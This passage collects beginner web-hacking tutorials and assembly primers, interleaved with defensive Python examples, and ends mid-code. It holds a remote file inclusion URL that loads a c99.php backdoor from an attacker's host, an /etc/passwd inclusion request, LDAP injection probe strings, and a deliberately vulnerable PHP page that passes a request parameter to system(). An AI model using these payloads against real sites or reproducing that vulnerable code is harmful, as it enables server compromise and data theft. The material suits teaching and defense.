Install Joomla and do the practice

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

We have installed WordPress, which is really very easy to install. Now I am going to show you how to install Joomla. I think you are smart enough to understand why we need Joomla, WordPress and the other things. Let's start,

Download Joomla from http://www.joomla.org/download.html

It is a zip file. Extract it the same way I did for WordPress.

We need to install apache2, php5-mysql, libapache2-mod-php5 and mysql-server.

Some of them we already installed when we installed WordPress.

So simply:

apt-get install libapache2-mod-php5

Now we need to configure the MySQL server for Joomla.

Here is the screenshot:

Please type the command by hand instead of copying and pasting (hehe). You can also see 3 errors in this screenshot, which are juicy for a hacker: whenever you give a bad command you will get an error like this.

We are ready to go. Browse http://localhost/joomla/installation/ and click "Next":


In the next stage you will see another window which checks whether all dependencies are present. Make sure:


OK, click "Next".

Now it should display the license agreement. Again click "Next".


Now it should display a page for configuring the database. So configure it like:


Warning: You should not use the root user for the database if you are following this guide for business purposes.
OK, now click "Next".

Now you will get the FTP server configuration. If you do not wish to use the FTP service then just click "Next".



This is the last step:



Now just: rm -r /var/www/joomla/installation
DONE!

Default admin page: http://localhost/administrator




Good Luck!!!


Install WordPress (Default) and do the practice

You should not run any hacking tools against, or attempt to hack, third-party websites, which may bring some danger for you. Also some people do not even know how to create their own website for testing purposes or even for serious business. So I will explain how we can install our own web software such as WordPress, phpBB, MyBB, Joomla etc. Installing this software is very easy. Let's start.

(NOTE: You need these things to understand what follows.)

WordPress:

You need to install MySQL, Apache, PHP and php-gd.

Currently I am using Kubuntu. If you are also running Kubuntu or Ubuntu then run:

apt-get install mysql-server php5 php-gd php5-mysql

Specify your MySQL password. Remember, by default this will be the MySQL root password (be aware!!!).

Please download WordPress from their site (http://wordpress.org/latest.zip) with the command wget -c http://wordpress.org/latest.zip.

root@security:~/Desktop/Web software# cp wordpress-3.2.zip /var/www

root@security:~ /var/www# unzip wordpress-3.2.zip
root@security:~ /var/www# cd wordpress
Now we need to edit wp-config-sample.php.
First copy the sample file (this keeps the original as a backup):
root@security:~ /var/www/wordpress# cp wp-config-sample.php wp-config.php

Now we edit it:

root@security:~ /var/www/wordpress# nano wp-config.php

We just need to edit a few simple things:

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Insert_your_username_here');

/** MySQL database password */
define('DB_PASSWORD', 'and_Password_of_Mysql');

Screenshot:

One question: are you sure that you have a database named "wordpress"? I don't think so. So create the database, otherwise the installation will fail:

Good!!! Now you are ready to go...

Just visit http://localhost/wordpress/wp-admin/install.php (or the IP) and you will see:

Simply fill in the form and click the "Install" button.

Good!! You have just installed WordPress:

Click the "Log in" button for WordPress administration.

Now enjoy, and practice security on your own site.

Next we will install "Joomla".

Finding hidden files and directories of a target website

Discovering hidden files and directories is important for hackers and penetration testers. There are many webmasters/developers who keep default files, configuration files, admin pages and database dumps insecurely. For example, many times I was able to read a database file (such as db.sql), a configuration file (such as config.php) etc. But some 10% of clever developers try to rename these files too. Anyway, finding hidden files is an important technique for information gathering and finding vulnerabilities.
We can do this by brute force and dictionary attack, but it may take a very long time, and the target may also get DDoSed.
How it works: imagine our target site is www.false.com. It has a user login page, www.false.com/admini, for logging in users. But we need to find the real administrator page so that we can log in and edit their site... right? We also tried manually (several times) submitting some random URLs like www.false.com/administrator, or admni etc., but no luck. Instead of doing this manually we have tools to do it automatically and fast. The tool will submit many guessed directory and file names and we have to understand the HTTP response codes (do you know about 400, 403, 200 etc.?). This is not only for finding the admin page but also for finding configuration files, interesting directories, default files/directories and even vulnerabilities (so we can call it URL fuzzing) etc.
Warning: remember it will all be logged as errors (error.log/error_log file). So there is some worry about getting caught, and about DDoSing the target.
There are many tools such as DirBuster, Burp Suite or custom Python scripts etc. which we can download to do this job. But I am going to show you the OWASP DirBuster (go to owasp.org to download it).
When we open DirBuster (java -jar dirbuster.jar), we get:

I have installed Joomla locally (directory: /var/www/joomla). So I am going to attack my own site like:

Here my target URL is 192.168.1.214. I ticked "Go Faster" so that it attacks more quickly, and set the dictionary file (/pentest/web/dirbuster/directory-list-1.0.txt). I want to fuzz my Joomla site; Joomla is installed in the /joomla directory (192.168.1.214/joomla), and the default PHP file extension is to be fuzzed.
At last click "Start".

Here we see the Type, Found, Response, Size, Include and Status sections.
"Type" tells us whether it is a file or a directory; the "Found" section shows what DirBuster found; "Response" is the HTTP code (200=OK, 404=Not Found, 403=Forbidden etc.); "Size" tells how many kB/MB the page or directory is (sometimes it is interesting when a found page/directory has a very different size); "Status" tells whether the tool is still working.
Now simply browse all the found files and directories. Sometimes you may get a blank page, for example when I try to browse 192.168.1.214/joomla/configuration.php, because it is not readable. If the foolish developer or webmaster chmods it readable then he is fucked.

We see in the output that DirBuster found the "administrator" page (joomla/administrator/index.php) and the configuration file (joomla/configuration.php), which are really interesting.
Perhaps we can do some malicious things like LFI, SQLi etc. Just think a little bit about it.
Let me know if you catch any mistake (I love to learn)....
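Added example from the defender's side (not from the original post): the target's access log records exactly what DirBuster does, so this Python script, run over constructed sample lines in Apache combined format, flags a source IP whose requests are mostly 404s and lists the 200/403 hits from that IP that should be reviewed first. The IPs, timestamps and the "DirBuster-1.0-RC1" user agent are constructed values.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache "combined" log format (not taken from the
# original post). 192.168.1.50 plays the DirBuster run; 10.0.0.7 is a normal visitor.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Jan/2012:10:00:01 +0000] "GET /joomla/ HTTP/1.1" 200 5120 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:01 +0000] "GET /joomla/admin/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:01 +0000] "GET /joomla/admni/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:02 +0000] "GET /joomla/backup/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:02 +0000] "GET /joomla/db.sql HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:02 +0000] "GET /joomla/configuration.php HTTP/1.1" 200 0 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:03 +0000] "GET /joomla/administrator/index.php HTTP/1.1" 200 3100 "-" "DirBuster-1.0-RC1"
192.168.1.50 - - [10/Jan/2012:10:00:03 +0000] "GET /joomla/test/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.7 - - [10/Jan/2012:10:00:05 +0000] "GET /joomla/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2012:10:00:09 +0000] "GET /joomla/index.php?option=com_content HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2012:10:00:12 +0000] "GET /favicon.ico HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_log(text):
    """Yield one dict per well-formed combined-log line; skip anything else."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def find_bruteforcers(text, min_404=5, min_ratio=0.5):
    """Flag source IPs whose traffic looks like directory/file guessing.

    Returns {ip: {"requests": n, "not_found": n, "hits": [...]}} for every IP
    that produced at least `min_404` 404s and whose 404 share is >= min_ratio.
    `hits` lists the paths the same IP got a 200/403 for (the "Found" rows
    DirBuster shows), which is what the defender should review first.
    """
    per_ip = defaultdict(lambda: {"requests": 0, "not_found": 0, "hits": []})
    for rec in parse_log(text):
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        if rec["status"] == "404":
            stats["not_found"] += 1
        elif rec["status"] in ("200", "403"):
            stats["hits"].append(rec["path"])
    flagged = {}
    for ip, stats in per_ip.items():
        ratio = stats["not_found"] / stats["requests"]
        if stats["not_found"] >= min_404 and ratio >= min_ratio:
            flagged[ip] = stats
    return flagged

if __name__ == "__main__":
    for ip, stats in find_bruteforcers(SAMPLE_LOG).items():
        print(ip, stats["not_found"], "x 404 of", stats["requests"], "requests")
        for path in stats["hits"]:
            print("  review:", path)
```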

Tools: metagoofil (file search)

All penetration testers and hackers search for files belonging to their target site because it is important for information gathering (custom passwords, internal ideas about the company etc.). Google is the friend of the hacker or penetration tester. They search using Google-fu or automated tools such as metagoofil. Metagoofil is a good Python script for doing such a job.

How to use:

Simply type "./metagoofil.py" in the terminal/Konsole and you will get all the options for using it.

They also gave some examples of how to use it. But here is a practical usage:

root@bt:/pentest/enumeration/google/metagoofil# ./metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsoftfiles -f results.html

It will start searching and will automatically download the specified files (lol, be aware).

Now try it against your own site for practice purposes.

I don't think that we need someone to teach us how to use tools.

Easy man... So try everything!!!

Tools: goohost

Goohost is a simple Bash script that searches Google for information about the target website. It searches for IPs, subdomains and email addresses.

Usage example:

cd /pentest/enumeration/goohost

/pentest/enumeration/google/goohost# ./goohost.sh -t backtrack-linux.org -m ip -p 10 -v

Type ./goohost.sh for help...

How to exploit a File Inclusion vulnerability

File inclusion is also a dangerous vulnerability. It may appear in any server-side scripting language, but most of the time it appears in PHP scripts because of some bogus code around include, require_once etc.

There are two types of file inclusion vulnerability: Remote File Inclusion and Local File Inclusion.

Remote File Inclusion Vulnerability:

Perhaps you have heard about RFI (Remote File Inclusion), which is really dangerous. If an RFI vulnerability exists then an attacker (hacker) may load some malicious script (just think about an IFRAME).

Suppose my target is :

www.bank.com/index.php?fool=developer

So somewhere in the "*.php" there is some code like:

$fool = $_GET['fool'];
include( $fool . '.php' );

So "include" will actually load developer.php. But we can browse the site in another, malicious way, because we are hackers. Suppose we hosted a c99.php backdoor on our own website (www.mysite.com/c99.php). Now it is time to exploit it like:

www.bank.com/index.php?fool=http://www.mysite.com/c99.php . If the target website loads this page then we can run commands, upload files etc.

Local File Inclusion:

LFI (Local File Inclusion) is the same as RFI, but it loads a local file from the target server.

For example :

www.bank.com/lfi.php?include=/etc/passwd

But now my favourite Linux does not allow you to write files or read /etc/shadow without sudo/su power. But of course we can read other files such as MySQL files, error logs, and write some temp files etc.

Easy to understand?
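Added example (not from the original post, and in Python rather than PHP): the same include($fool . '.php') decision written with the checks that reject both requests shown above, the remote c99.php URL and an /etc/passwd traversal. PAGES_DIR and the page names are hypothetical.

```python
import os
from urllib.parse import urlsplit

# Hypothetical layout for this example: page templates live under PAGES_DIR.
PAGES_DIR = "/var/www/bank/pages"
ALLOWED_PAGES = {"developer", "about", "contact"}   # hypothetical allowlist

def vulnerable_target(fool):
    """What the post's include($fool . '.php') tries to load: whatever was sent,
    so an http://... value becomes a remote include and ../ walks the filesystem."""
    return fool + ".php"

def is_remote(value):
    """True when the value carries a URL scheme (http://, ftp://, php://, data:)."""
    return urlsplit(value).scheme != ""

def resolve_page(fool, allowlist=ALLOWED_PAGES):
    """Return the absolute file to include, or None when the request is rejected.

    Checks, in order:
      1. no URL scheme   -> blocks the RFI form ?fool=http://www.mysite.com/c99.php
      2. no NUL byte     -> old PHP would truncate "x.php" after \\x00
      3. allowlist       -> the real fix: only names the application knows
      4. containment     -> defence in depth: the normalised path must stay
                            under PAGES_DIR, which blocks ../../etc/passwd
    """
    if is_remote(fool) or "\x00" in fool:
        return None
    if allowlist is not None and fool not in allowlist:
        return None
    # abspath() normalises "..": a traversal attempt ends up outside PAGES_DIR.
    # In a real deployment use os.path.realpath() so symlinks are resolved too.
    candidate = os.path.abspath(os.path.join(PAGES_DIR, fool + ".php"))
    if os.path.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate

if __name__ == "__main__":
    for value in ("developer", "http://www.mysite.com/c99", "../../../etc/passwd"):
        print(repr(value), "->", vulnerable_target(value), "|", resolve_page(value))
```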

Understanding the assembly language, part 2

I briefly explained some basic things and some instructions in part 1. In this post I will discuss more about assembly language, such as variables, arrays, conditionals, loops etc. Remember, these posts are only for a basic understanding of asm, not to make you a coder.

Variable:

A variable is a data storage location. If you have done other programming languages (you should, before asm) then you know how variables work. A variable stores some data to be used later when needed. I want to give you examples from 3 programming languages.

1. Python example code:

#!/usr/bin/env python

variable1 = 1337
variable2 = "you are"

print "This is variable testing."
print "Now you know what is a variable because", variable2, variable1

So here "variable1" and "variable2" store some data (the values 1337 and "you are"). The last statement (print) uses these two variables, so it prints "Now you know what is a variable because you are 1337". This is how variables work.



2. PHP example code:

<?php
$var1 = "You are 1337";      // Note: PHP variables start with "$"
echo "Great !!! ";
echo $var1;
?>

Here $var1 is the variable and it stores the data "You are 1337".

OK, this is how variables work in a high-level language, but for assembly language it is very different. Suppose we want to add and subtract some numbers. Here is the example:

.data
var1 dword 1000      ; Note: if it is a string (A) then it should be quoted, like "A"
var2 dword 337
var3 dword 1337
.code
mov eax,var1
add eax,var2
sub eax,var3

We know that all variables live in the .data section, so we need to define the variables there. Here I declared 3 variables, var1, var2 and var3, with the values var1=1000, var2=337, var3=1337.
So first we move the var1 value (1000) into the eax register, then we add var2 (337), so the eax register value is now 1337. Then we subtract var3 (1337) and now eax becomes 0.

This is how variables work in assembly language.

Array:

We know that an array is a variable which holds multiple data elements of the same data type. Suppose we have the variables

a=1
b=2
c=3
d=4

Instead of declaring individual variables we can also do it with an array, like (imagine) a=1,2,3,4.

In the C programming language we declare an array with square brackets:

int something[5] = {1,2,3,4};

When we access the data of an array we write code like "something[0]"... no?

Assembly is different. Assembly language does not accept {} and we need to declare an array in the .data section, such as:

.data

array

......

An array is like a variable; it just holds multiple values. So we need to keep it in the .data section:

.data
array1 dword 1234,5678,9101h
.code
mov esi,array1+4    ; esi=5678 (the second element, 4 bytes in)
mov array1+0,esi    ; store 5678 in the first element of the array
lea esi,[array1+8]  ; load the address of the third element (remember it is 32-bit asm)

...

----------

Conditional:

Programming languages allow us to make decisions based on True and False. Often we want to make a conditional decision.

Imagine: >>If you are a true hacker>>>Then you are a researcher>>If you are not a true hacker>>>Then you are just a skid>>>So skip here>>>No way, and close.

We can also make conditional decisions in asm code (Example 1):

cmp eax,10     ; compare eax with 10
je target      ; if eax=10 then jump to the target label

target:
       code
          .
          .
       mov esi,1337
       cmp esi,1337
       je target2     ; if esi=1337 then jump to the target2 label
Example 2:

mov eax, 100
cmp eax,60
jg target3    ; jg=Jump if Greater

Some conditional jump instructions:

jnz = Jump if not zero (Zero Flag=0)
jns = Jump if not signed (Sign Flag=0)
jc = Jump if carry (Carry Flag=1)
jo = Jump if overflow (Overflow Flag=1)
jno = Jump if not overflow (Overflow Flag=0)

etc...

Looping

We know how a loop works. In Python we use something like "for loop in somewhere: start looping". But in assembly there are only two specific instructions (short details below).

LOOPNZ instruction (Loop if not zero): it decrements ecx and keeps looping while ecx is not zero and the Zero Flag is clear.

Example:

loopnz label1

LOOPNE instruction (Loop if not equal): it is equivalent to LOOPNZ and shares the same opcode.

Now let's discuss some extra things which we need to know...

Data-related operators:

I understand about 4 types of data operators, below:

PTR operator: suppose we want to move the low 16 bits of a dword variable into a 16-bit register. Actually it is not allowed directly, because the operand sizes do not match. So the only possible way is the "PTR" operator.

.data
dwd dword 33333333h

.code
mov si, WORD PTR dwd  ; This is the way

Wrong:
.data
dwd dword 33333333h

.code
mov si,dwd ; It will not work because a double word can't be stored into a 16-bit register.

LENGTHOF operator: the LENGTHOF operator counts how many elements are in an array. Example:

.data
thisisthearray dword 10,11,12,13,14,15

.code
mov eax,LENGTHOF thisisthearray ; eax = 6, the number of elements in "thisisthearray"

TYPE operator: the TYPE operator simply gives the size in bytes of one element of a variable or array. Example:

.data
myvar dword 12345678h

.code
mov esi,TYPE myvar  ; esi = 4, because a dword is 4 bytes

SIZEOF operator:

.data
arry WORD 32 DUP(0)
.code
mov eax,SIZEOF arry

Ah, how does it work? "arry" has TYPE 2 and LENGTHOF 32. So it will be double, meaning eax=64, because the SIZEOF operator multiplies LENGTHOF by TYPE.

OK guys.... Now it is time to practice. Just do some Google searches and read more. I just tried to explain (sorry for the bad English, I tried). I think that you are now interested in learning more about asm. So finally I recommend you visit:

Some instructions: Go here

Some code. Most of the code is for 16 bits but I believe you will understand the code clearly, because you already know that the only difference is the "E", for example ax=eax. So go here

I just try to read ASM code over and over, and if I don't understand any instruction or anything then I first search on Google. Perhaps this is how I am improving my assembly language.

Welcome any feedback (sec00rit3y@gmail.com)

Understanding the assembly language, part 1

First of all, I am not an expert coder in assembly language. I don't write assembly code. But I believe having some knowledge of assembly language is an advantage for developing exploits or finding software vulnerabilities, because any debugger will output everything as ASM code. So if we can't read it then we are unable to understand what's going on. I have explained here the basics of assembly language.

Note: I am not a master or a teacher. I want to be a good student so that I can always learn. I am always interested in learning new things or fixing my mistakes. So if you find any mistake then please comment or email me so that I can fix myself. I believe sharing knowledge increases knowledge.

———————————————————————————————————————

Data Definition:

There are several types of data definition, such as for 8 bits, 16 bits, 32 bits, 64 bits etc. For each data size there is a specific definition:

BYTE: 8-bit unsigned integer. B stands for BYTE.
SBYTE: this is also an 8-bit integer, but S means signed. So S stands for signed.
WORD: a word is a 16-bit unsigned integer.
SWORD: S stands for signed. SWORD is a 16-bit signed integer.
DWORD: DWORD means double word, meaning word+word=DWORD.
SDWORD: hopefully you can understand that it is a double word, but signed.

Example:
variable1 BYTE 'Z'                ; This is 8 bits, unsigned, with the value 'Z'
variable2 SBYTE -2                ; This is 8 bits, signed, with the value -2
variable3 WORD 65535              ; This is 16 bits unsigned, defined as 'WORD'
variable4 SWORD -23255            ; This is a signed WORD
variable5 DWORD 11133314h         ; This is an unsigned double word example
variable6 SDWORD -35964939        ; Signed double word

ASSEMBLY LANGUAGE REGISTERS:

Registers are used to store binary data. Of course, all these registers have a specific purpose.
There are eight 32-bit general purpose registers, six segment registers, a processor status flags register and an instruction pointer. Through these registers the program executes.
32-bit general purpose registers:

EAX (called the Extended Accumulator register): EAX is used by the multiplication and division instructions.

ECX (called Extended Count): the CPU automatically uses ECX as the loop counter.

EBX (Extended Base register): it can be used for storing data.

EDX (Extended Data register): EDX allows for complex calculations.

EBP (Extended Base/Frame Pointer register): used for local variables on the stack.

ESI and EDI (Extended Source Index register and Extended Destination Index register): these two registers are used by high-speed memory transfer instructions.

ESP (Extended Stack Pointer): addresses data on the stack.

Segment registers:

SS (Stack Segment): pointer to the stack.

CS (Code Segment): pointer to the code.

DS (Data Segment): pointer to the data.

ES (Extra Segment): pointer to extra data.

FS (F Segment): pointer to more extra data.

GS (G Segment): pointer to more and more data.

EIP (Instruction Pointer): it holds the address of the next instruction to execute.

DATA MOVEMENT AND INSTRUCTIONS:

MOV instruction:

The MOV instruction copies data from source to destination. The format is:

mov dest, src

It loads the src data into dest. So clearly the src is moved to the destination (dest).

MOV can do:

mov register, register
mov register, memory
mov memory, register
mov register, immediate
mov memory, immediate

Example:
.data
myexample dword ?
myexample2 dword ?
.code
mov eax, myexample             ; Move the myexample variable into eax
mov myexample2,eax             ; Move the eax data into myexample2

MOVZX instruction:

This instruction (zero extend) copies the content from source to destination and zero-extends the value to 16 or 32 bits.

Example:

.data
val1 word 0A9DCh
.code
mov bx,val1     ; bx = 0A9DCh
movzx eax,bx    ; eax = 0000A9DCh (the upper 16 bits are filled with zeros)

MOVSX instruction:
The MOVSX instruction moves signed data. The 'S' stands for signed.

The LAHF instruction:
LAHF means "Load Status Flags into AH".

Example:

.daTa                          ; This is no problem, because asm is not case sensitive.
saveme BYTE ?

.code
lahf
mov saveme, ah                 ; All status flags are saved in a variable

Instruction SAHF (Store AH into Status Flags):

Example:

.data
samevar BYTE ?
.code
mov ah,samevar
sahf

XCHG (exchange data):

Example:

xchg eax, ebx

ADD instruction:

The ADD instruction adds the source to the destination (1+1=2).

Example:

.data
variable1 dword 5000
variable2 dword 6000

.code
mov eax, variable1
add eax, variable2

What's going on here? Simple: first we need to move the variable1 data (5000) into the eax register so that we can add the second value. Then variable2 (6000) is added and eax becomes 11000.

SUB instruction:

This instruction subtracts the source data from the destination.

Example:

.data
myvariable dword 11111111h
myvariable2 dword 11111111h

.code
mov eax, myvariable
sub eax, myvariable2

Same as the ADD instruction, just it subtracts 11111111h from 11111111h (eax=0).

INC instruction:
The INC instruction increments (adds 1 to) a single register or memory location.

Example:

.data
myvariable dword 11111111h
.code
mov eax, myvariable
inc eax

First I moved the variable's data into eax, then it was incremented by 1 (eax=11111112h). It can also be incremented directly (inc myvariable).

DEC instruction:
Same as the INC instruction, but it decrements by 1.

Example:

.data
myvariable dword 10000001
.code
dec myvariable

So what happened? Simple, it just decremented the memory by 1 (myvariable became 10000000).

JMP instruction: jmp=jump; the instruction jumps to the destination. For example:

label:                        ; a label works like a function
         all code goes here.
         jmp label            ; This will repeat endlessly.

LOOP instruction: hey, how about Python looping? Don't remember?

for love in range(3):
    print "This is the loop"

I think it is the same here also, but it is easier to understand. Example:

.data
looper DWORD ?                  ; o_o why "?"? It reserves space for the data.
.code
mov ecx,200
label:
       mov looper,ecx
       loop label               ; Go back to label

POP instruction: first the POP instruction copies the data from the stack pointed to by ESP, then it increments ESP.

Example:

pop ebx

POPFD instruction: popfd pops the top of the stack into EFLAGS.

PUSH INSTRUCTION: the push instruction decrements the extended stack pointer (esp), then copies the source onto the stack. Example:

.code
push ebx

CALL instruction: this instruction calls code at a new memory location. For example:

.code
mov ebx,data
call esp

So first it stores "data" into the ebx register and the next instruction calls the address in esp (lol, shellcode?).

There are many instructions... Please Google them to see how they work. Frankly, Google is my first and best master.

Anyway, I hope this discussion gave you some hints about assembly language. In part 2 I will discuss variables, arrays, functions etc.

Oh, don't forget to mail me if you catch any mistake here... please (sec00rit3y@gmail.com).

So, to be continued guys...
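Added example (not from either post): a small Python interpreter for the subset of 32-bit MASM-style code used in part 1 and part 2 (.data dword variables and arrays, mov/add/sub, cmp with je/jg, loop), fed with the posts' own variable, array and LOOP snippets so you can check what eax, ecx and memory end up holding. It is a teaching aid, not an assembler: only ZF and SF are modelled, so jg ignores the overflow flag.

```python
REGS = ("eax", "ebx", "ecx", "edx", "esi", "edi")
MASK = 0xFFFFFFFF

def imm(tok):  # MASM number: 1337 (decimal) or 9101h / 0A9DCh (hex)
    return int(tok[:-1], 16) if tok.lower().endswith("h") else int(tok)

class MiniAsm:
    """Interprets the 32-bit subset used in the two posts: .data dword variables and
    arrays, mov/add/sub, cmp with je/jg, and loop. Tracks ZF and SF only (no OF)."""

    def __init__(self, source):
        self.regs = dict.fromkeys(REGS, 0)
        self.mem, self.syms = {}, {}        # byte offset -> dword; variable name -> offset
        self.zf = self.sf = 0
        self.code, self.labels = [], {}
        section, offset = None, 0
        for raw in source.splitlines():
            line = raw.split(";")[0].strip()    # drop ; comments
            if not line:
                continue
            if line.lower() in (".data", ".code"):
                section = line.lower()
            elif section == ".data":            # name dword v1,v2,...  (? = uninitialised)
                name, _, init = line.split(None, 2)
                self.syms[name] = offset
                for v in init.split(","):
                    self.mem[offset] = 0 if v.strip() == "?" else imm(v.strip())
                    offset += 4                 # a dword occupies 4 bytes
            elif line.endswith(":"):            # label: -> index of the next instruction
                self.labels[line[:-1]] = len(self.code)
            else:
                op, _, rest = line.partition(" ")
                self.code.append((op.lower(), [a.strip() for a in rest.split(",")]))

    def addr(self, tok):                        # memory operand: var or var+8 (bytes)
        name, _, off = tok.partition("+")
        return self.syms[name] + (int(off) if off else 0)

    def get(self, tok):
        if tok.lower() in REGS:
            return self.regs[tok.lower()]
        return imm(tok) if tok[0].isdigit() else self.mem[self.addr(tok)]

    def put(self, tok, value):
        if tok.lower() in REGS: self.regs[tok.lower()] = value & MASK
        else: self.mem[self.addr(tok)] = value & MASK

    def flags(self, result):                    # ZF/SF from a 32-bit result, as cmp/add/sub do
        result &= MASK
        self.zf, self.sf = int(result == 0), result >> 31
        return result

    def run(self, max_steps=100000):
        ip = 0
        while ip < len(self.code) and max_steps > 0:
            max_steps -= 1
            op, a = self.code[ip]
            ip += 1
            if op == "mov":   self.put(a[0], self.get(a[1]))
            elif op == "add": self.put(a[0], self.flags(self.get(a[0]) + self.get(a[1])))
            elif op == "sub": self.put(a[0], self.flags(self.get(a[0]) - self.get(a[1])))
            elif op == "cmp": self.flags(self.get(a[0]) - self.get(a[1]))
            elif op == "je" and self.zf:                   ip = self.labels[a[0]]
            elif op == "jg" and not (self.zf or self.sf):  ip = self.labels[a[0]]
            elif op == "loop":                  # dec ecx, then jump while ecx != 0
                self.regs["ecx"] = (self.regs["ecx"] - 1) & MASK
                if self.regs["ecx"]:
                    ip = self.labels[a[0]]
            elif op not in ("je", "jg"):
                raise ValueError("unsupported instruction: " + op)
        return self.regs

# The posts' own snippets, reproduced as constructed inputs.
VARIABLES = ".data\nvar1 dword 1000\nvar2 dword 337\nvar3 dword 1337\n" \
            ".code\nmov eax,var1\nadd eax,var2\nsub eax,var3"       # eax: 1000 -> 1337 -> 0
ARRAY = ".data\narray1 dword 1234,5678,9101h\n.code\nmov esi,array1+4\nmov array1+0,esi"
LOOPING = ".data\nlooper DWORD ?\n.code\nmov ecx,200\nlabel:\nmov looper,ecx\nloop label"

if __name__ == "__main__":
    print(MiniAsm(VARIABLES).run()["eax"])          # 0
    m = MiniAsm(LOOPING); m.run()
    print(m.regs["ecx"], m.mem[m.syms["looper"]])   # 0 1
```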
LDAP injection!!

LDAP = Lightweight Directory Access Protocol. This protocol is used to access a directory server over the network, and it uses port number 389.

If you don't know about LDAP then here you go: http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol

LDAP also stores names, credit cards, emails and other information. LDAP is also exploitable like other databases. LDAP injection is similar to SQL injection.

NOTE: remember I am telling you what I do. So feedback is welcome. I am not a master and I don't want to be a master.

Suppose there is a website which allows us to search the site. So I simply put "*" in the search field and click the search button. If it is really dealing with LDAP then it will match all directory entries and output all the information on the page.

If it is a URL then it would be like: www.example.com/search.asp?vulnerable=*

Simple way to identify the vulnerability (bad input):

*
)(cn=*
))))
*))

Reference:
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_%28OWASP-DV-006%29

Try more...

Hacking is not a crime, it is philosophy, it is research!!!
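Added example (not from the original post): the defender's side of the search box above, in Python. It escapes the user's term per RFC 4515 before it goes into the filter, shows what the post's probe inputs turn into with and without escaping, and includes a cheap check you can run over search-term logs. The cn attribute and the "alice" term are constructed.

```python
# Escaping per RFC 4515 section 3: the characters that have meaning inside an
# LDAP filter are replaced by a backslash and their two-digit hex code.
FILTER_ESCAPES = {
    "*": r"\2a", "(": r"\28", ")": r"\29", "\\": r"\5c", "\x00": r"\00",
}

def escape_filter_value(value):
    """Escape a string for use as an assertion value inside an LDAP filter."""
    out = []
    for ch in value:
        if ch in FILTER_ESCAPES:
            out.append(FILTER_ESCAPES[ch])
        elif ord(ch) > 0x7F:                      # non-ASCII: escape each UTF-8 byte
            out.extend(r"\%02x" % b for b in ch.encode("utf-8"))
        else:
            out.append(ch)
    return "".join(out)

def naive_search_filter(term):
    """The vulnerable pattern behind search.asp?vulnerable=*: raw concatenation,
    so "*" matches every entry and ")(cn=*" rewrites the filter structure."""
    return "(cn=%s)" % term

def safe_search_filter(term):
    """Same query, but the term can only ever be matched literally."""
    return "(cn=%s)" % escape_filter_value(term)

def looks_like_injection(term):
    """Cheap detection for search-term logs: filter metacharacters in the input."""
    return any(ch in term for ch in "*()\\\x00")

# The probe inputs from the post plus one ordinary term, as constructed test data.
PROBES = ["*", ")(cn=*", "))))", "*))", "alice"]

if __name__ == "__main__":
    for p in PROBES:
        print("%-10r naive=%-16s safe=%-22s suspicious=%s" % (
            p, naive_search_filter(p), safe_search_filter(p), looks_like_injection(p)))
```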

OS command injection vulnerability

"OS=Operating System" command injection is a high-impact vulnerability for a server/website. If any website has an OS command injection vulnerability then a malicious hacker can compromise the website or even the server's operating system. If a hacker can detect the vulnerability then he can run any operating system command. For example, if I run the command "rm -r /var/www" on my computer then it is going to remove "www", but what if I run this command on my victim's computer?

How we detect this vulnerability:

Suppose our target address is www.victim.com/vultest/lame.php

And the source code:
<html>
<head>
<title>Vulnerable Page</title>
</head>
<body>
<p><b>We will test the OS command injection vulnerability against this page. Actually the developer doesn't know how serious the code is.</b></p>

<p><b>Output of command:</b></p>
<?php
system($_REQUEST['cmd']);
?>

<p><b><i>This is how the OS command injection vulnerability works.</i></b></p>
</body>
</html>

In that page the PHP code is also just:

<?php system($_REQUEST['cmd']); ?>

(This is white box... Just copy it and paste it into a PHP web page for practice purposes.)

This is the OS command injection vulnerability. Because of this simple mistake anyone can run any OS-specific command against the server/website.


So if we run a simple command, "ping":

We get a reply on the page (along with the other content). In a real-world test we may not see the reply, but it will delay for some time (4-10 seconds?). If this is the case then we can run any command, e.g. "ls".

If any of these statements is in the source code:

exec
system
passthru
shell_exec
proc_open
pcntl_exec

then it is highly suspect that the site is vulnerable.


Suppose we don't have the source code; then how do we test? The way is fuzzing (with tools, or manually). Sometimes we call it black box testing.

To test it we need to write some code for fuzzing purposes, or we can use ready-made tools which are freely downloadable from the internet such as Burp Suite, wfuzz, vulnerability scanners, or test manually by hand etc. I think you have the logic for automated testing, otherwise you will get some "false" results from your lam0 tools...
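A quick white-box check for the sink list above, as an added example (not from the original post): a line-by-line Python scan over constructed PHP source that reports every call to the listed functions (plus the backtick operator) and rates a line "high" when a request superglobal appears in the same statement, which is exactly the shape of the post's system($_REQUEST['cmd']). The sample page and its $host variable are constructed.

```python
import re

# Sinks the post lists; the backtick operator is shell_exec in disguise.
SINKS = ("exec", "system", "passthru", "shell_exec", "proc_open", "pcntl_exec")
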